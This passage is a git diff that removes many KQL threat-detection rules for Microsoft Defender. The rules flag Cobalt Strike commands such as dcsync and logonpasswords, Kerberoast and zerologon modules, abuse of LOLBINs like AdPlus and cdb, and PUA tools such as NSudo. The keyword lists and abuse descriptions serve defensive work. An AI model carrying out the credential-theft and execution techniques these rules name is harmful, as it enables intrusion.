"204.79.197.0/24")))))
\ No newline at end of file
diff --git a/Execution/Operator_Bloopers_Cobalt_Strike_Commands.kql b/Execution/Operator_Bloopers_Cobalt_Strike_Commands.kql
deleted file mode 100644
index f62f88b2..00000000
--- a/Execution/Operator_Bloopers_Cobalt_Strike_Commands.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: _pete_0, TheDFIRReport
-// Date: 2022/05/06
-// Level: high
-// Description: Detects use of Cobalt Strike commands accidentally entered in the CMD shell
-// Tags: attack.execution, attack.t1059.003, stp.1u
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "psinject" or ProcessCommandLine contains "spawnas" or ProcessCommandLine contains "make_token" or ProcessCommandLine contains "remote-exec" or ProcessCommandLine contains "rev2self" or ProcessCommandLine contains "dcsync" or ProcessCommandLine contains "logonpasswords" or ProcessCommandLine contains "execute-assembly" or ProcessCommandLine contains "getsystem") and (ProcessCommandLine startswith "cmd " or ProcessCommandLine startswith "cmd.exe" or ProcessCommandLine startswith "c:\\windows\\system32\\cmd.exe")) and (ProcessVersionInfoOriginalFileName =~ "Cmd.Exe" or FolderPath endswith "\\cmd.exe")
\ No newline at end of file
diff --git a/Execution/Operator_Bloopers_Cobalt_Strike_Modules.kql b/Execution/Operator_Bloopers_Cobalt_Strike_Modules.kql
deleted file mode 100644
index ec317b49..00000000
--- a/Execution/Operator_Bloopers_Cobalt_Strike_Modules.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: _pete_0, TheDFIRReport
-// Date: 2022/05/06
-// Level: high
-// Description: Detects Cobalt Strike module/commands accidentally entered in CMD shell
-// Tags: attack.execution, attack.t1059.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Invoke-UserHunter" or ProcessCommandLine contains "Invoke-ShareFinder" or ProcessCommandLine contains "Invoke-Kerberoast" or ProcessCommandLine contains "Invoke-SMBAutoBrute" or ProcessCommandLine contains "Invoke-Nightmare" or ProcessCommandLine contains "zerologon" or ProcessCommandLine contains "av_query") and (ProcessVersionInfoOriginalFileName =~ "Cmd.Exe" or FolderPath endswith "\\cmd.exe")
\ No newline at end of file
diff --git a/Execution/Outbound_Network_Connection_Initiated_By_Microsoft_Dialer.kql b/Execution/Outbound_Network_Connection_Initiated_By_Microsoft_Dialer.kql
deleted file mode 100644
index d47a865d..00000000
--- a/Execution/Outbound_Network_Connection_Initiated_By_Microsoft_Dialer.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: CertainlyP
-// Date: 2024/04/26
-// Level: high
-// Description: Detects outbound network connection initiated by Microsoft Dialer.
-The Microsoft Dialer, also known as Phone Dialer, is a built-in utility application included in various versions of the Microsoft Windows operating system. Its primary function is to provide users with a graphical interface for managing phone calls via a modem or a phone line connected to the computer.
-This is an outdated process in the current conext of it's usage and is a common target for info stealers for process injection, and is used to make C2 connections, common example is "Rhadamanthys"
-
-// Tags: attack.execution, attack.t1071.001
-DeviceNetworkEvents
-| where InitiatingProcessFolderPath endswith ":\\Windows\\System32\\dialer.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7"))))
\ No newline at end of file
diff --git a/Execution/Outbound_Network_Connection_To_Public_IP_Via_Winlogon.kql b/Execution/Outbound_Network_Connection_To_Public_IP_Via_Winlogon.kql
deleted file mode 100644
index 88e21026..00000000
--- a/Execution/Outbound_Network_Connection_To_Public_IP_Via_Winlogon.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io
-// Date: 2023/04/28
-// Level: medium
-// Description: Detects a "winlogon.exe" process that initiate network communications with public IP addresses
-// Tags: attack.defense_evasion, attack.execution, attack.command_and_control, attack.t1218.011
-DeviceNetworkEvents
-| where InitiatingProcessFolderPath endswith "\\winlogon.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7"))))
\ No newline at end of file
diff --git a/Execution/Outlook_EnableUnsafeClientMailRules_Setting_Enabled.kql b/Execution/Outlook_EnableUnsafeClientMailRules_Setting_Enabled.kql
deleted file mode 100644
index e7d4364e..00000000
--- a/Execution/Outlook_EnableUnsafeClientMailRules_Setting_Enabled.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Markus Neis, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2018/12/27
-// Level: high
-// Description: Detects an attacker trying to enable the outlook security setting "EnableUnsafeClientMailRules" which allows outlook to run applications or execute macros
-// Tags: attack.execution, attack.t1059, attack.t1202
-DeviceProcessEvents
-| where ProcessCommandLine contains "\\Outlook\\Security\\EnableUnsafeClientMailRules"
\ No newline at end of file
diff --git a/Execution/PCRE.NET_Package_Image_Load.kql b/Execution/PCRE.NET_Package_Image_Load.kql
deleted file mode 100644
index 87180de7..00000000
--- a/Execution/PCRE.NET_Package_Image_Load.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/10/29
-// Level: high
-// Description: Detects processes loading modules related to PCRE.NET package
-// Tags: attack.execution, attack.t1059
-DeviceImageLoadEvents
-| where FolderPath contains "\\AppData\\Local\\Temp\\ba9ea7344a4a5f591d6e5dc32a13494b\\"
\ No newline at end of file
diff --git a/Execution/PCRE.NET_Package_Temp_Files.kql b/Execution/PCRE.NET_Package_Temp_Files.kql
deleted file mode 100644
index 0db1282d..00000000
--- a/Execution/PCRE.NET_Package_Temp_Files.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/10/29
-// Level: high
-// Description: Detects processes creating temp files related to PCRE.NET package
-// Tags: attack.execution, attack.t1059
-DeviceFileEvents
-| where FolderPath contains "\\AppData\\Local\\Temp\\ba9ea7344a4a5f591d6e5dc32a13494b\\"
\ No newline at end of file
diff --git a/Execution/PDQ_Deploy_Remote_Adminstartion_Tool_Execution.kql b/Execution/PDQ_Deploy_Remote_Adminstartion_Tool_Execution.kql
deleted file mode 100644
index 09b3d975..00000000
--- a/Execution/PDQ_Deploy_Remote_Adminstartion_Tool_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/10/01
-// Level: medium
-// Description: Detect use of PDQ Deploy remote admin tool
-// Tags: attack.execution, attack.lateral_movement, attack.t1072
-DeviceProcessEvents
-| where ProcessVersionInfoFileDescription =~ "PDQ Deploy Console" or ProcessVersionInfoProductName =~ "PDQ Deploy" or ProcessVersionInfoCompanyName =~ "PDQ.com" or ProcessVersionInfoOriginalFileName =~ "PDQDeployConsole.exe"
\ No newline at end of file
diff --git a/Execution/PSEXEC_Remote_Execution_File_Artefact.kql b/Execution/PSEXEC_Remote_Execution_File_Artefact.kql
deleted file mode 100644
index 67f96f11..00000000
--- a/Execution/PSEXEC_Remote_Execution_File_Artefact.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/21
-// Level: high
-// Description: Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system
-// Tags: attack.lateral_movement, attack.privilege_escalation, attack.execution, attack.persistence, attack.t1136.002, attack.t1543.003, attack.t1570, attack.s0029
-DeviceFileEvents
-| where FolderPath endswith ".key" and FolderPath startswith "C:\\Windows\\PSEXEC-"
\ No newline at end of file
diff --git a/Execution/PUA_-_AdvancedRun_Execution.kql b/Execution/PUA_-_AdvancedRun_Execution.kql
deleted file mode 100644
index 4e6050fc..00000000
--- a/Execution/PUA_-_AdvancedRun_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/01/20
-// Level: medium
-// Description: Detects the execution of AdvancedRun utility
-// Tags: attack.execution, attack.defense_evasion, attack.privilege_escalation, attack.t1564.003, attack.t1134.002, attack.t1059.003
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "AdvancedRun.exe" or (ProcessCommandLine contains " /EXEFilename " and ProcessCommandLine contains " /Run") or (ProcessCommandLine contains " /WindowState 0" and ProcessCommandLine contains " /RunAs " and ProcessCommandLine contains " /CommandLine ")
\ No newline at end of file
diff --git a/Execution/PUA_-_CsExec_Execution.kql b/Execution/PUA_-_CsExec_Execution.kql
deleted file mode 100644
index 8057d416..00000000
--- a/Execution/PUA_-_CsExec_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/08/22
-// Level: high
-// Description: Detects the use of the lesser known remote execution tool named CsExec a PsExec alternative
-// Tags: attack.resource_development, attack.t1587.001, attack.execution, attack.t1569.002
-DeviceProcessEvents
-| where FolderPath endswith "\\csexec.exe" or ProcessVersionInfoFileDescription =~ "csexec"
\ No newline at end of file
diff --git a/Execution/PUA_-_NSudo_Execution.kql b/Execution/PUA_-_NSudo_Execution.kql
deleted file mode 100644
index a3bb925b..00000000
--- a/Execution/PUA_-_NSudo_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali
-// Date: 2022/01/24
-// Level: high
-// Description: Detects the use of NSudo tool for command execution
-// Tags: attack.execution, attack.t1569.002, attack.s0029
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-U:S " or ProcessCommandLine contains "-U:T " or ProcessCommandLine contains "-U:E " or ProcessCommandLine contains "-P:E " or ProcessCommandLine contains "-M:S " or ProcessCommandLine contains "-M:H " or ProcessCommandLine contains "-U=S " or ProcessCommandLine contains "-U=T " or ProcessCommandLine contains "-U=E " or ProcessCommandLine contains "-P=E " or ProcessCommandLine contains "-M=S " or ProcessCommandLine contains "-M=H " or ProcessCommandLine contains "-ShowWindowMode:Hide") and ((FolderPath endswith "\\NSudo.exe" or FolderPath endswith "\\NSudoLC.exe" or FolderPath endswith "\\NSudoLG.exe") or (ProcessVersionInfoOriginalFileName in~ ("NSudo.exe", "NSudoLC.exe", "NSudoLG.exe")))
\ No newline at end of file
diff --git a/Execution/PUA_-_NirCmd_Execution.kql b/Execution/PUA_-_NirCmd_Execution.kql
deleted file mode 100644
index 68200d1c..00000000
--- a/Execution/PUA_-_NirCmd_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/01/24
-// Level: medium
-// Description: Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity
-// Tags: attack.execution, attack.t1569.002, attack.s0029
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " execmd " or ProcessCommandLine contains ".exe script " or ProcessCommandLine contains ".exe shexec " or ProcessCommandLine contains " runinteractive ") or (FolderPath endswith "\\NirCmd.exe" or ProcessVersionInfoOriginalFileName =~ "NirCmd.exe")) or ((ProcessCommandLine contains " exec " or ProcessCommandLine contains " exec2 ") and (ProcessCommandLine contains " show " or ProcessCommandLine contains " hide "))
\ No newline at end of file
diff --git a/Execution/PUA_-_NirCmd_Execution_As_LOCAL_SYSTEM.kql b/Execution/PUA_-_NirCmd_Execution_As_LOCAL_SYSTEM.kql
deleted file mode 100644
index d9debfcd..00000000
--- a/Execution/PUA_-_NirCmd_Execution_As_LOCAL_SYSTEM.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/01/24
-// Level: high
-// Description: Detects the use of NirCmd tool for command execution as SYSTEM user
-// Tags: attack.execution, attack.t1569.002, attack.s0029
-DeviceProcessEvents
-| where ProcessCommandLine contains " runassystem "
\ No newline at end of file
diff --git a/Execution/PUA_-_Radmin_Viewer_Utility_Execution.kql b/Execution/PUA_-_Radmin_Viewer_Utility_Execution.kql
deleted file mode 100644
index 9edcca22..00000000
--- a/Execution/PUA_-_Radmin_Viewer_Utility_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/22
-// Level: medium
-// Description: Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines
-// Tags: attack.execution, attack.lateral_movement, attack.t1072
-DeviceProcessEvents
-| where ProcessVersionInfoFileDescription =~ "Radmin Viewer" or ProcessVersionInfoProductName =~ "Radmin Viewer" or ProcessVersionInfoOriginalFileName =~ "Radmin.exe"
\ No newline at end of file
diff --git a/Execution/PUA_-_RunXCmd_Execution.kql b/Execution/PUA_-_RunXCmd_Execution.kql
deleted file mode 100644
index fc892f3c..00000000
--- a/Execution/PUA_-_RunXCmd_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/01/24
-// Level: high
-// Description: Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts
-// Tags: attack.execution, attack.t1569.002, attack.s0029
-DeviceProcessEvents
-| where (ProcessCommandLine contains " /account=system " or ProcessCommandLine contains " /account=ti ") and ProcessCommandLine contains "/exec="
\ No newline at end of file
diff --git a/Execution/PUA_-_Wsudo_Suspicious_Execution.kql b/Execution/PUA_-_Wsudo_Suspicious_Execution.kql
deleted file mode 100644
index 1282a6c6..00000000
--- a/Execution/PUA_-_Wsudo_Suspicious_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/12/02
-// Level: high
-// Description: Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc)
-// Tags: attack.execution, attack.privilege_escalation, attack.t1059
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-u System" or ProcessCommandLine contains "-uSystem" or ProcessCommandLine contains "-u TrustedInstaller" or ProcessCommandLine contains "-uTrustedInstaller" or ProcessCommandLine contains " --ti ") or (FolderPath endswith "\\wsudo.exe" or ProcessVersionInfoOriginalFileName =~ "wsudo.exe" or ProcessVersionInfoFileDescription =~ "Windows sudo utility" or InitiatingProcessFolderPath endswith "\\wsudo-bridge.exe")
\ No newline at end of file
diff --git a/Execution/Parent_in_Public_Folder_Suspicious_Process.kql b/Execution/Parent_in_Public_Folder_Suspicious_Process.kql
deleted file mode 100644
index 65b83f51..00000000
--- a/Execution/Parent_in_Public_Folder_Suspicious_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/02/25
-// Level: high
-// Description: This rule detects suspicious processes with parent images located in the C:\Users\Public folder
-// Tags: attack.defense_evasion, attack.execution, attack.t1564, attack.t1059
-DeviceProcessEvents
-| where (ProcessCommandLine contains "powershell" or ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd.exe /r " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd /c " or ProcessCommandLine contains "cmd /r " or ProcessCommandLine contains "cmd /k " or ProcessCommandLine contains "wscript.exe" or ProcessCommandLine contains "cscript.exe" or ProcessCommandLine contains "bitsadmin" or ProcessCommandLine contains "certutil" or ProcessCommandLine contains "mshta.exe") and InitiatingProcessFolderPath startswith "C:\\Users\\Public\\"
\ No newline at end of file
diff --git a/Execution/Perl_Inline_Command_Execution.kql b/Execution/Perl_Inline_Command_Execution.kql
deleted file mode 100644
index c6389427..00000000
--- a/Execution/Perl_Inline_Command_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/02
-// Level: medium
-// Description: Detects execution of perl using the "-e"/"-E" flags. This is could be used as a way to launch a reverse shell or execute live perl code.
-// Tags: attack.execution, attack.t1059
-DeviceProcessEvents
-| where ProcessCommandLine contains " -e" and (FolderPath endswith "\\perl.exe" or ProcessVersionInfoOriginalFileName =~ "perl.exe")
\ No newline at end of file
diff --git a/Execution/Php_Inline_Command_Execution.kql b/Execution/Php_Inline_Command_Execution.kql
deleted file mode 100644
index d4eeee8a..00000000
--- a/Execution/Php_Inline_Command_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/02
-// Level: medium
-// Description: Detects execution of php using the "-r" flag. This is could be used as a way to launch a reverse shell or execute live php code.
-// Tags: attack.execution, attack.t1059
-DeviceProcessEvents
-| where ProcessCommandLine contains " -r" and (FolderPath endswith "\\php.exe" or ProcessVersionInfoOriginalFileName =~ "php.exe")
\ No newline at end of file
diff --git a/Execution/Potential_Adplus.EXE_Abuse.kql b/Execution/Potential_Adplus.EXE_Abuse.kql
deleted file mode 100644
index 680e85fa..00000000
--- a/Execution/Potential_Adplus.EXE_Abuse.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/09
-// Level: high
-// Description: Detects execution of "AdPlus.exe", a binary that is part of the Windows SDK that can be used as a LOLBIN in order to dump process memory and execute arbitrary commands.
-// Tags: attack.defense_evasion, attack.execution, attack.t1003.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -hang " or ProcessCommandLine contains " -pn " or ProcessCommandLine contains " -pmn " or ProcessCommandLine contains " -p " or ProcessCommandLine contains " -po " or ProcessCommandLine contains " -c " or ProcessCommandLine contains " -sc ") and (FolderPath endswith "\\adplus.exe" or ProcessVersionInfoOriginalFileName =~ "Adplus.exe")
\ No newline at end of file
diff --git a/Execution/Potential_Arbitrary_Command_Execution_Via_FTP.EXE.kql b/Execution/Potential_Arbitrary_Command_Execution_Via_FTP.EXE.kql
deleted file mode 100644
index 4d1541c8..00000000
--- a/Execution/Potential_Arbitrary_Command_Execution_Via_FTP.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, oscd.community
-// Date: 2020/10/09
-// Level: medium
-// Description: Detects execution of "ftp.exe" script with the "-s" or "/s" flag and any child processes ran by "ftp.exe".
-// Tags: attack.execution, attack.t1059, attack.defense_evasion, attack.t1202
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\ftp.exe" or ((ProcessCommandLine contains "-s:" or ProcessCommandLine contains "/s:") and (FolderPath endswith "\\ftp.exe" or ProcessVersionInfoOriginalFileName =~ "ftp.exe"))
\ No newline at end of file
diff --git a/Execution/Potential_Arbitrary_File_Download_Via_Cmdl32.EXE.kql b/Execution/Potential_Arbitrary_File_Download_Via_Cmdl32.EXE.kql
deleted file mode 100644
index 4d75232f..00000000
--- a/Execution/Potential_Arbitrary_File_Download_Via_Cmdl32.EXE.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113
-// Date: 2021/11/03
-// Level: medium
-// Description: Detects execution of Cmdl32 with the "/vpn" and "/lan" flags.
-Attackers can abuse this utility in order to download arbitrary files via a configuration file.
-Inspect the location and the content of the file passed as an argument in order to determine if it is suspicious.
-
-// Tags: attack.execution, attack.defense_evasion, attack.t1218, attack.t1202
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/vpn" and ProcessCommandLine contains "/lan") and (FolderPath endswith "\\cmdl32.exe" or ProcessVersionInfoOriginalFileName =~ "CMDL32.EXE")
\ No newline at end of file
diff --git a/Execution/Potential_Binary_Impersonating_Sysinternals_Tools.kql b/Execution/Potential_Binary_Impersonating_Sysinternals_Tools.kql
deleted file mode 100644
index e33493d3..00000000
--- a/Execution/Potential_Binary_Impersonating_Sysinternals_Tools.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/12/20
-// Level: medium
-// Description: Detects binaries that use the same name as legitimate sysinternals tools to evade detection
-// Tags: attack.execution, attack.defense_evasion, attack.t1218, attack.t1202
-DeviceProcessEvents
-| where (FolderPath endswith "\\accesschk.exe" or FolderPath endswith "\\accesschk64.exe" or FolderPath endswith "\\AccessEnum.exe" or FolderPath endswith "\\ADExplorer.exe" or FolderPath endswith "\\ADExplorer64.exe" or FolderPath endswith "\\ADInsight.exe" or FolderPath endswith "\\ADInsight64.exe" or FolderPath endswith "\\adrestore.exe" or FolderPath endswith "\\adrestore64.exe" or FolderPath endswith "\\Autologon.exe" or FolderPath endswith "\\Autologon64.exe" or FolderPath endswith "\\Autoruns.exe" or FolderPath endswith "\\Autoruns64.exe" or FolderPath endswith "\\autorunsc.exe" or FolderPath endswith "\\autorunsc64.exe" or FolderPath endswith "\\Bginfo.exe" or FolderPath endswith "\\Bginfo64.exe" or FolderPath endswith "\\Cacheset.exe" or FolderPath endswith "\\Cacheset64.exe" or FolderPath endswith "\\Clockres.exe" or FolderPath endswith "\\Clockres64.exe" or FolderPath endswith "\\Contig.exe" or FolderPath endswith "\\Contig64.exe" or FolderPath endswith "\\Coreinfo.exe" or FolderPath endswith "\\Coreinfo64.exe" or FolderPath endswith "\\CPUSTRES.EXE" or FolderPath endswith "\\CPUSTRES64.EXE" or FolderPath endswith "\\ctrl2cap.exe" or FolderPath endswith "\\Dbgview.exe" or FolderPath endswith "\\dbgview64.exe" or FolderPath endswith "\\Desktops.exe" or FolderPath endswith "\\Desktops64.exe" or FolderPath endswith "\\disk2vhd.exe" or FolderPath endswith "\\disk2vhd64.exe" or FolderPath endswith "\\diskext.exe" or FolderPath endswith "\\diskext64.exe" or FolderPath endswith "\\Diskmon.exe" or FolderPath endswith "\\Diskmon64.exe" or FolderPath endswith "\\DiskView.exe" or FolderPath endswith "\\DiskView64.exe" or FolderPath endswith "\\du.exe" or FolderPath endswith "\\du64.exe" or FolderPath endswith "\\efsdump.exe" or FolderPath endswith "\\FindLinks.exe" or FolderPath endswith "\\FindLinks64.exe" or FolderPath endswith "\\handle.exe" or FolderPath endswith "\\handle64.exe" or FolderPath endswith "\\hex2dec.exe" or FolderPath endswith "\\hex2dec64.exe" or FolderPath endswith "\\junction.exe" or FolderPath endswith "\\junction64.exe" or FolderPath endswith "\\ldmdump.exe" or FolderPath endswith "\\listdlls.exe" or FolderPath endswith "\\listdlls64.exe" or FolderPath endswith "\\livekd.exe" or FolderPath endswith "\\livekd64.exe" or FolderPath endswith "\\loadOrd.exe" or FolderPath endswith "\\loadOrd64.exe" or FolderPath endswith "\\loadOrdC.exe" or FolderPath endswith "\\loadOrdC64.exe" or FolderPath endswith "\\logonsessions.exe" or FolderPath endswith "\\logonsessions64.exe" or FolderPath endswith "\\movefile.exe" or FolderPath endswith "\\movefile64.exe" or FolderPath endswith "\\notmyfault.exe" or FolderPath endswith "\\notmyfault64.exe" or FolderPath endswith "\\notmyfaultc.exe" or FolderPath endswith "\\notmyfaultc64.exe" or FolderPath endswith "\\ntfsinfo.exe" or FolderPath endswith "\\ntfsinfo64.exe" or FolderPath endswith "\\pendmoves.exe" or FolderPath endswith "\\pendmoves64.exe" or FolderPath endswith "\\pipelist.exe" or FolderPath endswith "\\pipelist64.exe" or FolderPath endswith "\\portmon.exe" or FolderPath endswith "\\procdump.exe" or FolderPath endswith "\\procdump64.exe" or FolderPath endswith "\\procexp.exe" or FolderPath endswith "\\procexp64.exe" or FolderPath endswith "\\Procmon.exe" or FolderPath endswith "\\Procmon64.exe" or FolderPath endswith "\\psExec.exe" or FolderPath endswith "\\psExec64.exe" or FolderPath endswith "\\psfile.exe" or FolderPath endswith "\\psfile64.exe" or FolderPath endswith "\\psGetsid.exe" or FolderPath endswith "\\psGetsid64.exe" or FolderPath endswith "\\psInfo.exe" or FolderPath endswith "\\psInfo64.exe" or FolderPath endswith "\\pskill.exe" or FolderPath endswith "\\pskill64.exe" or FolderPath endswith "\\pslist.exe" or FolderPath endswith "\\pslist64.exe" or FolderPath endswith "\\psLoggedon.exe" or FolderPath endswith "\\psLoggedon64.exe" or FolderPath endswith "\\psloglist.exe" or FolderPath endswith "\\psloglist64.exe" or FolderPath endswith "\\pspasswd.exe" or FolderPath endswith "\\pspasswd64.exe" or FolderPath endswith "\\psping.exe" or FolderPath endswith "\\psping64.exe" or FolderPath endswith "\\psService.exe" or FolderPath endswith "\\psService64.exe" or FolderPath endswith "\\psshutdown.exe" or FolderPath endswith "\\psshutdown64.exe" or FolderPath endswith "\\pssuspend.exe" or FolderPath endswith "\\pssuspend64.exe" or FolderPath endswith "\\RAMMap.exe" or FolderPath endswith "\\RDCMan.exe" or FolderPath endswith "\\RegDelNull.exe" or FolderPath endswith "\\RegDelNull64.exe" or FolderPath endswith "\\regjump.exe" or FolderPath endswith "\\ru.exe" or FolderPath endswith "\\ru64.exe" or FolderPath endswith "\\sdelete.exe" or FolderPath endswith "\\sdelete64.exe" or FolderPath endswith "\\ShareEnum.exe" or FolderPath endswith "\\ShareEnum64.exe" or FolderPath endswith "\\shellRunas.exe" or FolderPath endswith "\\sigcheck.exe" or FolderPath endswith "\\sigcheck64.exe" or FolderPath endswith "\\streams.exe" or FolderPath endswith "\\streams64.exe" or FolderPath endswith "\\strings.exe" or FolderPath endswith "\\strings64.exe" or FolderPath endswith "\\sync.exe" or FolderPath endswith "\\sync64.exe" or FolderPath endswith "\\Sysmon.exe" or FolderPath endswith "\\Sysmon64.exe" or FolderPath endswith "\\tcpvcon.exe" or FolderPath endswith "\\tcpvcon64.exe" or FolderPath endswith "\\tcpview.exe" or FolderPath endswith "\\tcpview64.exe" or FolderPath endswith "\\Testlimit.exe" or FolderPath endswith "\\Testlimit64.exe" or FolderPath endswith "\\vmmap.exe" or FolderPath endswith "\\vmmap64.exe" or FolderPath endswith "\\Volumeid.exe" or FolderPath endswith "\\Volumeid64.exe" or FolderPath endswith "\\whois.exe" or FolderPath endswith "\\whois64.exe" or FolderPath endswith "\\Winobj.exe" or FolderPath endswith "\\Winobj64.exe" or FolderPath endswith "\\ZoomIt.exe" or FolderPath endswith "\\ZoomIt64.exe") and (not((isnull(ProcessVersionInfoCompanyName) or (ProcessVersionInfoCompanyName in~ ("Sysinternals - www.sysinternals.com", "Sysinternals")))))
\ No newline at end of file
diff --git a/Execution/Potential_Binary_Proxy_Execution_Via_Cdb.EXE.kql b/Execution/Potential_Binary_Proxy_Execution_Via_Cdb.EXE.kql
deleted file mode 100644
index 17de2322..00000000
--- a/Execution/Potential_Binary_Proxy_Execution_Via_Cdb.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Beyu Denis, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019/10/26
-// Level: medium
-// Description: Detects usage of "cdb.exe" to launch arbitrary processes or commands from a debugger script file
-// Tags: attack.execution, attack.t1106, attack.defense_evasion, attack.t1218, attack.t1127
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -c " or ProcessCommandLine contains " -cf ") and (FolderPath endswith "\\cdb.exe" or ProcessVersionInfoOriginalFileName =~ "CDB.Exe")
\ No newline at end of file
diff --git a/Execution/Potential_CobaltStrike_Process_Patterns.kql b/Execution/Potential_CobaltStrike_Process_Patterns.kql
deleted file mode 100644
index 03bf6e5d..00000000
--- a/Execution/Potential_CobaltStrike_Process_Patterns.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021/07/27
-// Level: high
-// Description: Detects potential process patterns related to Cobalt Strike beacon activity
-// Tags: attack.execution, attack.t1059
-DeviceProcessEvents
-| where (ProcessCommandLine endswith "conhost.exe 0xffffffff -ForceV1" and (InitiatingProcessCommandLine contains "cmd.exe /C echo" and InitiatingProcessCommandLine contains " > \\\\.\\pipe")) or (ProcessCommandLine endswith "conhost.exe 0xffffffff -ForceV1" and InitiatingProcessCommandLine endswith "/C whoami") or (ProcessCommandLine endswith "cmd.exe /C whoami" and InitiatingProcessFolderPath startswith "C:\\Temp\\") or ((ProcessCommandLine contains "cmd.exe /c echo" and ProcessCommandLine contains "> \\\\.\\pipe") and (InitiatingProcessFolderPath endswith "\\runonce.exe" or InitiatingProcessFolderPath endswith "\\dllhost.exe"))
\ No newline at end of file
diff --git a/Execution/Potential_CobaltStrike_Service_Installations_-_Registry.kql b/Execution/Potential_CobaltStrike_Service_Installations_-_Registry.kql
deleted file mode 100644
index e448ad48..00000000
--- a/Execution/Potential_CobaltStrike_Service_Installations_-_Registry.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Wojciech Lesicki
-// Date: 2021/06/29
-// Level: high
-// Description: Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.
-
-// Tags: attack.execution, attack.privilege_escalation, attack.lateral_movement, attack.t1021.002, attack.t1543.003, attack.t1569.002
-DeviceRegistryEvents
-| where ((RegistryValueData contains "ADMIN$" and RegistryValueData contains ".exe") or (RegistryValueData contains "%COMSPEC%" and RegistryValueData contains "start" and RegistryValueData contains "powershell")) and (RegistryKey contains "\\System\\CurrentControlSet\\Services" or (RegistryKey contains "\\System\\ControlSet" and RegistryKey contains "\\Services"))
\ No newline at end of file
diff --git a/Execution/Potential_CommandLine_Path_Traversal_Via_Cmd.EXE.kql b/Execution/Potential_CommandLine_Path_Traversal_Via_Cmd.EXE.kql
deleted file mode 100644
